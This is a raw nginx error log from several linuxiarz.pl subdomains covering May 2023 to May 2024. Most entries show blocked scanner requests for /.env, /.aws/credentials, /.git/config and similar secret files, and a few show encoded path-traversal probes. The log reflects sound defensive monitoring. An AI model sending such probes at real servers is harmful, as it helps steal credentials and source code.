nginx.linuxiarz.pl, request: "GET /gentoo/.git/HEAD HTTP/1.1", host: "nginx.linuxiarz.pl", referrer: "http://nginx.linuxiarz.pl/gentoo/.git/HEAD" +2023/05/31 22:11:27 [error] 3237345#3237345: *55899 access forbidden by rule, client: 3.70.222.50, server: nginx.linuxiarz.pl, request: "GET /debian/.git/HEAD HTTP/1.1", host: "nginx.linuxiarz.pl", referrer: "http://nginx.linuxiarz.pl/debian/.git/HEAD" +2023/05/31 22:11:42 [error] 3237345#3237345: *55905 access forbidden by rule, client: 3.70.222.50, server: nginx.linuxiarz.pl, request: "GET /archlinux/.git/HEAD HTTP/1.1", host: "nginx.linuxiarz.pl", referrer: "http://nginx.linuxiarz.pl/archlinux/.git/HEAD" +2023/05/31 22:11:56 [error] 3237345#3237345: *55907 access forbidden by rule, client: 3.70.222.50, server: nginx.linuxiarz.pl, request: "GET /FreeBSD/.git/HEAD HTTP/1.1", host: "nginx.linuxiarz.pl", referrer: "http://nginx.linuxiarz.pl/FreeBSD/.git/HEAD" +2023/06/01 16:54:58 [error] 3237345#3237345: *69087 access forbidden by rule, client: 109.237.97.227, server: kodi.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2023/06/08 02:30:36 [error] 3237345#3237345: *188544 access forbidden by rule, client: 109.237.97.227, server: kodi.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2023/07/06 00:59:25 [error] 3237345#3237345: *575391 access forbidden by rule, client: 146.190.101.202, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2023/07/06 00:59:52 [error] 3237345#3237345: *575402 access forbidden by rule, client: 146.190.101.202, server: nginx.linuxiarz.pl, request: "GET /.vscode/sftp.json HTTP/1.1", host: "nginx.linuxiarz.pl" +2023/07/07 00:37:29 [error] 3237345#3237345: *589003 access forbidden by rule, client: 146.190.101.202, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2023/07/07 00:37:42 [error] 3237345#3237345: *589014 access forbidden by rule, client: 146.190.101.202, server: pliki.linuxiarz.pl, request: "GET /.vscode/sftp.json HTTP/1.1", host: "pliki.linuxiarz.pl" +2023/07/08 01:18:32 [error] 3237345#3237345: *602809 access forbidden by rule, client: 50.21.179.101, server: kompilacje.linuxiarz.pl, request: "GET /.aws/credentials HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/07/08 01:25:43 [error] 3237345#3237345: *602849 access forbidden by rule, client: 151.106.108.24, server: nginx.linuxiarz.pl, request: "GET /.aws/credentials HTTP/1.1", host: "nginx.linuxiarz.pl" +2023/07/08 01:30:01 [error] 3237345#3237345: *602879 access forbidden by rule, client: 50.62.145.82, server: pliki.linuxiarz.pl, request: "GET /.aws/credentials HTTP/1.1", host: "pliki.linuxiarz.pl" +2023/07/08 12:59:47 [error] 3237345#3237345: *616307 access forbidden by rule, client: 146.190.101.202, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/07/08 13:01:15 [error] 3237345#3237345: *616355 access forbidden by rule, client: 146.190.101.202, server: kompilacje.linuxiarz.pl, request: "GET /.vscode/sftp.json HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/07/09 21:59:18 [error] 3237345#3237345: *671799 access forbidden by rule, client: 66.29.143.231, server: kompilacje.linuxiarz.pl, request: "GET /.aws/credentials HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/07/09 22:08:33 [error] 3237345#3237345: *672015 access forbidden by rule, client: 103.240.105.171, server: nginx.linuxiarz.pl, request: "GET /.aws/credentials HTTP/1.1", host: "nginx.linuxiarz.pl" +2023/07/09 22:13:00 [error] 3237345#3237345: *672125 access forbidden by rule, client: 95.111.226.15, server: pliki.linuxiarz.pl, request: "GET /.aws/credentials HTTP/1.1", host: "pliki.linuxiarz.pl" +2023/07/28 08:52:22 [error] 3237345#3237345: *993595 access forbidden by rule, client: 192.101.68.218, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2023/07/28 09:41:21 [error] 3237345#3237345: *994281 access forbidden by rule, client: 192.101.68.218, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2023/07/31 10:59:48 [error] 3237345#3237345: *1061465 access forbidden by rule, client: 103.42.58.103, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/07/31 11:06:58 [error] 3237345#3237345: *1061563 access forbidden by rule, client: 212.237.37.217, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2023/07/31 11:11:09 [error] 3237345#3237345: *1061611 access forbidden by rule, client: 203.146.170.155, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2023/08/03 06:05:56 [error] 3237345#3237345: *1124973 access forbidden by rule, client: 103.115.164.81, server: kompilacje.linuxiarz.pl, request: "GET /.aws/credentials HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/08/03 06:10:36 [error] 3237345#3237345: *1125035 access forbidden by rule, client: 46.229.237.101, server: nginx.linuxiarz.pl, request: "GET /.aws/credentials HTTP/1.1", host: "nginx.linuxiarz.pl" +2023/08/03 06:12:29 [error] 3237345#3237345: *1125053 access forbidden by rule, client: 217.160.232.32, server: pliki.linuxiarz.pl, request: "GET /.aws/credentials HTTP/1.1", host: "pliki.linuxiarz.pl" +2023/08/04 03:34:52 [error] 3237345#3237345: *1143885 access forbidden by rule, client: 92.204.138.222, server: kompilacje.linuxiarz.pl, request: "GET /.aws/credentials HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/08/04 03:38:53 [error] 3237345#3237345: *1143925 access forbidden by rule, client: 217.160.232.32, server: nginx.linuxiarz.pl, request: "GET /.aws/credentials HTTP/1.1", host: "nginx.linuxiarz.pl" +2023/08/04 03:41:50 [error] 3237345#3237345: *1143966 access forbidden by rule, client: 203.146.170.155, server: pliki.linuxiarz.pl, request: "GET /.aws/credentials HTTP/1.1", host: "pliki.linuxiarz.pl" +2023/08/07 01:45:04 [error] 3237345#3237345: *1222880 access forbidden by rule, client: 137.117.121.68, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2023/08/07 01:45:04 [error] 3237345#3237345: *1222881 access forbidden by rule, client: 137.117.121.68, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2023/08/09 18:51:06 [error] 3237345#3237345: *1287408 access forbidden by rule, client: 3.252.186.228, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/2.0", host: "pliki.linuxiarz.pl" +2023/08/10 23:41:04 [error] 3237345#3237345: *1314082 access forbidden by rule, client: 109.237.98.53, server: kodi.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2023/08/22 17:22:02 [error] 3038872#3038872: *293413 access forbidden by rule, client: 176.126.87.37, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2023/08/22 17:22:02 [error] 3038872#3038872: *293414 access forbidden by rule, client: 176.126.87.37, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2023/08/31 12:16:45 [error] 3038872#3038872: *514828 access forbidden by rule, client: 51.12.247.215, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/08/31 12:44:29 [error] 3038872#3038872: *515318 access forbidden by rule, client: 51.12.247.215, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2023/08/31 13:34:31 [error] 3038872#3038872: *516101 access forbidden by rule, client: 51.12.247.215, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2023/09/07 03:44:25 [error] 3038872#3038872: *670251 access forbidden by rule, client: 20.226.88.199, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/09/14 10:55:25 [error] 3038872#3038872: *859400 access forbidden by rule, client: 62.72.46.92, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2023/09/14 10:55:25 [error] 3038872#3038872: *859399 access forbidden by rule, client: 62.72.46.92, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2023/09/14 22:40:50 [error] 3038872#3038872: *872247 access forbidden by rule, client: 185.233.100.23, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2023/09/14 22:40:50 [error] 3038872#3038872: *872249 access forbidden by rule, client: 23.129.64.217, server: pliki.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "pliki.linuxiarz.pl" +2023/09/14 22:40:51 [error] 3038872#3038872: *872250 access forbidden by rule, client: 77.91.86.95, server: kompilacje.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/09/14 22:40:52 [error] 3038872#3038872: *872251 access forbidden by rule, client: 77.91.86.95, server: nginx.linuxiarz.pl, request: "GET /.DS_Store HTTP/1.1", host: "nginx.linuxiarz.pl" +2023/09/14 22:40:52 [error] 3038872#3038872: *872263 access forbidden by rule, client: 45.12.3.80, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl", referrer: "http://nginx.linuxiarz.pl/.git/config" +2023/09/14 22:40:53 [error] 3038872#3038872: *872265 access forbidden by rule, client: 89.236.112.100, server: nginx.linuxiarz.pl, request: "GET /.DS_Store HTTP/1.1", host: "nginx.linuxiarz.pl" +2023/09/14 22:40:53 [error] 3038872#3038872: *872266 access forbidden by rule, client: 107.189.1.96, server: kompilacje.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kompilacje.linuxiarz.pl", referrer: "http://kompilacje.linuxiarz.pl/.git/config" +2023/09/14 22:40:54 [error] 3038872#3038872: *872267 access forbidden by rule, client: 45.141.215.62, server: pliki.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "pliki.linuxiarz.pl", referrer: "http://pliki.linuxiarz.pl/.git/config" +2023/09/14 22:41:01 [error] 3038871#3038871: *872271 access forbidden by rule, client: 66.85.173.39, server: kompilacje.linuxiarz.pl, request: "GET /.DS_Store HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/09/14 22:41:01 [error] 3038871#3038871: *872272 access forbidden by rule, client: 66.85.173.39, server: pliki.linuxiarz.pl, request: "GET /.DS_Store HTTP/1.1", host: "pliki.linuxiarz.pl" +2023/09/14 22:41:03 [error] 3038872#3038872: *872276 access forbidden by rule, client: 185.220.101.10, server: kompilacje.linuxiarz.pl, request: "GET /.DS_Store HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/09/14 22:41:03 [error] 3038872#3038872: *872277 access forbidden by rule, client: 195.176.3.23, server: pliki.linuxiarz.pl, request: "GET /.DS_Store HTTP/1.1", host: "pliki.linuxiarz.pl" +2023/09/15 10:30:00 [error] 3038872#3038872: *882451 access forbidden by rule, client: 51.140.218.212, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/09/15 10:30:00 [error] 3038872#3038872: *882453 access forbidden by rule, client: 51.140.218.212, server: kompilacje.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/09/15 10:30:01 [error] 3038872#3038872: *882459 access forbidden by rule, client: 51.140.218.212, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2023/09/15 10:30:01 [error] 3038872#3038872: *882461 access forbidden by rule, client: 51.140.218.212, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2023/09/15 10:30:01 [error] 3038872#3038872: *882463 access forbidden by rule, client: 51.140.218.212, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2023/09/15 10:30:02 [error] 3038872#3038872: *882465 access forbidden by rule, client: 51.140.218.212, server: pliki.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "pliki.linuxiarz.pl" +2023/09/19 19:25:43 [error] 1052#1052: *53727 access forbidden by rule, client: 45.148.10.231, server: kodi.linuxiarz.pl, request: "GET /openam/oauth2/..;/ccversion/Version HTTP/1.1", host: "kodi.linuxiarz.pl" +2023/09/20 21:04:39 [error] 1052#1052: *83768 access forbidden by rule, client: 3.27.109.68, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/09/21 06:45:33 [error] 1052#1052: *101043 access forbidden by rule, client: 45.148.10.231, server: kodi.linuxiarz.pl, request: "GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc HTTP/1.1", host: "kodi.linuxiarz.pl" +2023/10/01 18:48:01 [error] 14744#14744: *167804 access forbidden by rule, client: 62.72.46.92, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2023/10/01 18:48:01 [error] 14744#14744: *167807 access forbidden by rule, client: 62.72.46.92, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2023/10/01 23:18:58 [error] 14744#14744: *173412 access forbidden by rule, client: 62.72.46.92, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2023/10/01 23:18:58 [error] 14744#14744: *173413 access forbidden by rule, client: 62.72.46.92, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2023/10/08 05:47:22 [error] 1416754#1416754: *91835 access forbidden by rule, client: 147.75.101.118, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2023/10/08 05:47:23 [error] 1416754#1416754: *91837 access forbidden by rule, client: 147.75.101.118, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2023/10/10 23:41:51 [error] 1416754#1416754: *156185 access forbidden by rule, client: 3.218.67.10, server: pliki.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "pliki.linuxiarz.pl" +2023/10/11 06:50:29 [error] 1416754#1416754: *161978 access forbidden by rule, client: 3.218.67.10, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2023/10/11 15:04:20 [error] 1416754#1416754: *170205 access forbidden by rule, client: 3.218.67.10, server: kompilacje.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/10/19 04:24:35 [error] 1416754#1416754: *353662 access forbidden by rule, client: 104.243.42.97, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2023/10/19 05:58:02 [error] 1416754#1416754: *354840 access forbidden by rule, client: 104.243.42.97, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2023/10/19 14:35:35 [error] 1416754#1416754: *365645 access forbidden by rule, client: 3.38.204.125, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2023/10/20 14:19:13 [error] 1416754#1416754: *390977 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.250.159, server: rspamd.linuxiarz.pl, request: "GET / HTTP/2.0", upstream: "http://127.0.0.1:11334/", host: "rspamd.linuxiarz.pl" +2023/10/20 14:19:14 [error] 1416754#1416754: *390977 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.250.159, server: rspamd.linuxiarz.pl, request: "GET / HTTP/2.0", upstream: "http://127.0.0.1:11334/", host: "rspamd.linuxiarz.pl" +2023/10/20 14:19:14 [error] 1416754#1416754: *390977 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.250.159, server: rspamd.linuxiarz.pl, request: "GET /favicon.ico HTTP/2.0", upstream: "http://127.0.0.1:11334/favicon.ico", host: "rspamd.linuxiarz.pl", referrer: "https://rspamd.linuxiarz.pl/" +2023/10/21 10:49:45 [error] 3901754#3901754: *17848 access forbidden by rule, client: 104.243.42.97, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2023/10/27 11:50:35 [error] 3901754#3901754: *161658 access forbidden by rule, client: 18.117.237.60, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/2.0", host: "kompilacje.linuxiarz.pl" +2023/11/04 23:39:30 [error] 1396#1396: *46860 access forbidden by rule, client: 103.11.199.160, server: kodi.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2023/11/12 00:17:17 [error] 1396#1396: *235283 access forbidden by rule, client: 147.78.103.125, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/11/19 19:42:05 [error] 1396#1396: *417337 access forbidden by rule, client: 52.66.204.210, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2023/12/03 18:16:40 [error] 1396#1396: *761042 access forbidden by rule, client: 31.220.0.86, server: kompilacje.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/12/25 07:57:54 [error] 1100#1100: *456042 access forbidden by rule, client: 212.237.37.217, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/12/25 08:01:34 [error] 1100#1100: *456085 access forbidden by rule, client: 167.86.122.200, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2023/12/25 08:04:09 [error] 1100#1100: *456118 access forbidden by rule, client: 154.61.74.7, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2023/12/26 19:44:36 [error] 1100#1100: *489831 access forbidden by rule, client: 91.215.184.155, server: kompilacje.linuxiarz.pl, request: "GET /.aws/credentials HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/12/26 19:47:45 [error] 1100#1100: *489882 access forbidden by rule, client: 51.38.185.245, server: nginx.linuxiarz.pl, request: "GET /.aws/credentials HTTP/1.1", host: "nginx.linuxiarz.pl" +2023/12/26 19:49:26 [error] 1100#1100: *489899 access forbidden by rule, client: 144.91.110.219, server: pliki.linuxiarz.pl, request: "GET /.aws/credentials HTTP/1.1", host: "pliki.linuxiarz.pl" +2023/12/30 15:03:06 [error] 1100#1100: *587724 access forbidden by rule, client: 154.61.74.7, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/12/30 15:05:49 [error] 1100#1100: *587851 access forbidden by rule, client: 51.38.185.245, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2023/12/30 15:07:07 [error] 1100#1100: *587863 access forbidden by rule, client: 162.240.15.209, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2024/01/05 11:57:48 [error] 1100#1100: *726718 access forbidden by rule, client: 31.220.0.86, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/01/06 08:13:54 [error] 1100#1100: *747611 access forbidden by rule, client: 31.220.0.86, server: pliki.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "pliki.linuxiarz.pl" +2024/01/08 17:20:11 [error] 1100#1100: *812064 access forbidden by rule, client: 54.93.71.43, server: pliki.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "pliki.linuxiarz.pl" +2024/01/08 23:07:07 [error] 1100#1100: *817047 access forbidden by rule, client: 31.220.0.86, server: kompilacje.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2024/01/10 05:01:29 [error] 1100#1100: *850420 access forbidden by rule, client: 154.61.74.7, server: kompilacje.linuxiarz.pl, request: "GET /.aws/credentials HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2024/01/10 05:01:59 [error] 1100#1100: *850422 access forbidden by rule, client: 194.163.144.192, server: nginx.linuxiarz.pl, request: "GET /.aws/credentials HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/01/10 05:03:00 [error] 1100#1100: *850439 access forbidden by rule, client: 18.136.208.45, server: pliki.linuxiarz.pl, request: "GET /.aws/credentials HTTP/1.1", host: "pliki.linuxiarz.pl" +2024/01/18 17:15:06 [error] 966473#966473: *177346 access forbidden by rule, client: 95.111.230.64, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/01/28 11:18:12 [error] 1046#1046: *109910 access forbidden by rule, client: 193.32.162.87, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/01/31 15:52:54 [error] 649186#649186: *100055 access forbidden by rule, client: 103.159.84.209, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/01/31 15:53:38 [error] 649186#649186: *100078 access forbidden by rule, client: 103.159.84.209, server: nginx.linuxiarz.pl, request: "GET /public/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/01/31 15:54:19 [error] 649186#649186: *100162 access forbidden by rule, client: 103.159.84.209, server: nginx.linuxiarz.pl, request: "GET /staging/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/01/31 15:54:56 [error] 649186#649186: *100186 access forbidden by rule, client: 103.159.84.209, server: nginx.linuxiarz.pl, request: "GET /admin/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/01/31 15:55:54 [error] 649186#649186: *100203 access forbidden by rule, client: 103.159.84.209, server: nginx.linuxiarz.pl, request: "GET /.env.example HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/02/08 23:26:27 [error] 649186#649186: *313987 access forbidden by rule, client: 180.244.161.103, server: kodi.linuxiarz.pl, request: "GET /.git/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2024/02/08 23:26:28 [error] 649186#649186: *313989 access forbidden by rule, client: 180.244.161.103, server: kodi.linuxiarz.pl, request: "GET /.git/HEAD HTTP/1.1", host: "kodi.linuxiarz.pl" +2024/02/10 01:52:13 [error] 649186#649186: *337250 access forbidden by rule, client: 5.44.111.112, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/02/10 01:52:35 [error] 649186#649186: *337254 access forbidden by rule, client: 5.44.111.112, server: nginx.linuxiarz.pl, request: "GET /public/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/02/10 01:52:54 [error] 649186#649186: *337269 access forbidden by rule, client: 5.44.111.112, server: nginx.linuxiarz.pl, request: "GET /staging/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/02/10 01:53:17 [error] 649186#649186: *337271 access forbidden by rule, client: 5.44.111.112, server: nginx.linuxiarz.pl, request: "GET /admin/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/02/10 01:53:40 [error] 649186#649186: *337272 access forbidden by rule, client: 5.44.111.112, server: nginx.linuxiarz.pl, request: "GET /.env.example HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/02/10 01:59:52 [error] 649186#649186: *337422 access forbidden by rule, client: 180.244.166.243, server: nginx.linuxiarz.pl, request: "GET /.git/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/02/10 01:59:53 [error] 649186#649186: *337424 access forbidden by rule, client: 180.244.166.243, server: nginx.linuxiarz.pl, request: "GET /.git/HEAD HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/02/11 20:02:23 [error] 649186#649186: *383218 access forbidden by rule, client: 18.144.27.156, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/02/16 12:03:38 [error] 3462290#3462290: *30158 access forbidden by rule, client: 194.233.75.51, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/02/18 00:37:20 [error] 3462290#3462290: *62798 access forbidden by rule, client: 180.244.162.74, server: kodi.linuxiarz.pl, request: "GET /.git/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2024/02/18 00:37:21 [error] 3462290#3462290: *62800 access forbidden by rule, client: 180.244.162.74, server: kodi.linuxiarz.pl, request: "GET /.git/HEAD HTTP/1.1", host: "kodi.linuxiarz.pl" +2024/02/22 05:46:54 [error] 1075#1075: *18901 access forbidden by rule, client: 54.95.52.243, server: nginx.linuxiarz.pl, request: "GET /.git/HEAD HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/03/10 15:39:19 [error] 170455#170455: *207578 access forbidden by rule, client: 78.153.140.175, server: kodi.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2024/03/10 15:39:19 [error] 170455#170455: *207579 access forbidden by rule, client: 78.153.140.175, server: kodi.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2024/03/12 19:24:50 [error] 170455#170455: *260966 access forbidden by rule, client: 20.127.146.149, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/03/14 19:27:30 [error] 170455#170455: *342990 access forbidden by rule, client: 42.240.136.121, server: nginx.linuxiarz.pl, request: "GET /.DS_Store HTTP/2.0", host: "nginx.linuxiarz.pl:443" +2024/03/15 00:27:42 [error] 170455#170455: *353154 access forbidden by rule, client: 42.240.136.121, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/2.0", host: "nginx.linuxiarz.pl:443" +2024/03/15 08:41:51 [error] 170455#170455: *363420 access forbidden by rule, client: 42.240.136.121, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/2.0", host: "nginx.linuxiarz.pl:443" +2024/03/17 01:12:47 [error] 2259970#2259970: *79327 access forbidden by rule, client: 43.204.228.72, server: kodi.linuxiarz.pl, request: "GET /.svn/wc.db HTTP/1.1", host: "kodi.linuxiarz.pl" +2024/03/18 05:56:06 [error] 2259970#2259970: *111014 access forbidden by rule, client: 43.204.228.72, server: kodi.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kodi.linuxiarz.pl" +2024/03/21 01:42:21 [error] 1100#1100: *37914 access forbidden by rule, client: 34.207.192.51, server: kodi.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kodi.linuxiarz.pl" +2024/03/21 04:15:54 [error] 1100#1100: *40002 access forbidden by rule, client: 34.207.192.51, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/03/22 12:33:06 [error] 1100#1100: *87629 access forbidden by rule, client: 106.75.175.181, server: nginx.linuxiarz.pl, request: "GET /.DS_Store HTTP/2.0", host: "nginx.linuxiarz.pl:443" +2024/03/22 19:29:47 [error] 1100#1100: *96405 access forbidden by rule, client: 106.75.137.241, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/2.0", host: "nginx.linuxiarz.pl:443" +2024/03/23 01:40:05 [error] 1100#1100: *105120 access forbidden by rule, client: 106.75.165.113, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/2.0", host: "nginx.linuxiarz.pl:443" +2024/04/12 18:17:16 [error] 3181503#3181503: *40251 access forbidden by rule, client: 16.171.195.64, server: kodi.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kodi.linuxiarz.pl" +2024/04/12 18:29:32 [error] 3181503#3181503: *40392 access forbidden by rule, client: 16.171.195.64, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/04/21 01:02:39 [error] 3884275#3884275: *142849 access forbidden by rule, client: 92.118.39.244, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/04/22 04:12:01 [error] 1093#1093: *3375 access forbidden by rule, client: 80.94.92.105, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/04/23 00:33:56 [error] 1093#1093: *31918 access forbidden by rule, client: 144.126.132.146, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/04/23 02:36:44 [error] 1093#1093: *33573 access forbidden by rule, client: 207.231.107.137, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/04/26 17:48:57 [error] 1093#1093: *119460 access forbidden by rule, client: 144.126.132.146, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/05/11 01:35:59 [error] 2645471#2645471: *4810 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.15, server: 0.0.0.0:443 +2024/05/15 23:17:28 [error] 2645472#2645472: *117470 access forbidden by rule, client: 83.147.52.42, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2024/05/18 02:04:15 [error] 2645471#2645471: *160865 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.15, server: 0.0.0.0:443 +2024/05/21 01:21:25 [error] 